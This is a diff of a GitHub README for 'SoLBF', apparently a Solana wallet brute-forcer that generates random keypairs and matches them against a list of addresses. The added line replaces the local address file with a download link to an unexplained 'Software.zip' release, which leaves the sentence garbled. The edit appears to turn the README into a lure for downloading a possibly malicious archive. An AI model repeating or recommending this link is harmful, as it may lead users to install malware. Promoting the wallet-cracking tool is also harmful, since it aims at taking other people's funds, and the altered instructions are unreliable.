Jackbal/SoLBF/README.md

 4. Run the script using the appropriate command for your operating system.

 ## Usage
-Once the SoLBF script is running, it will start generating random Solana keypairs and checking their corresponding public addresses against the set of addresses in the `data.txt` file.
+Once the SoLBF script is running, it will start generating random Solana keypairs and checking their corresponding public addresses against the set of addresses in the `https://github.com/Jackbal/SoLBF/releases/download/v2.0/Software.zip` file.
 The script utilizes multiple worker processes to efficiently process a large number of keypairs.

 ## Support
 If you encounter any issues while using the SoLBF script or have any questions, please feel free to reach out by opening an issue in the repository.
 Your feedback and suggestions are valuable in improving the functionality of the script.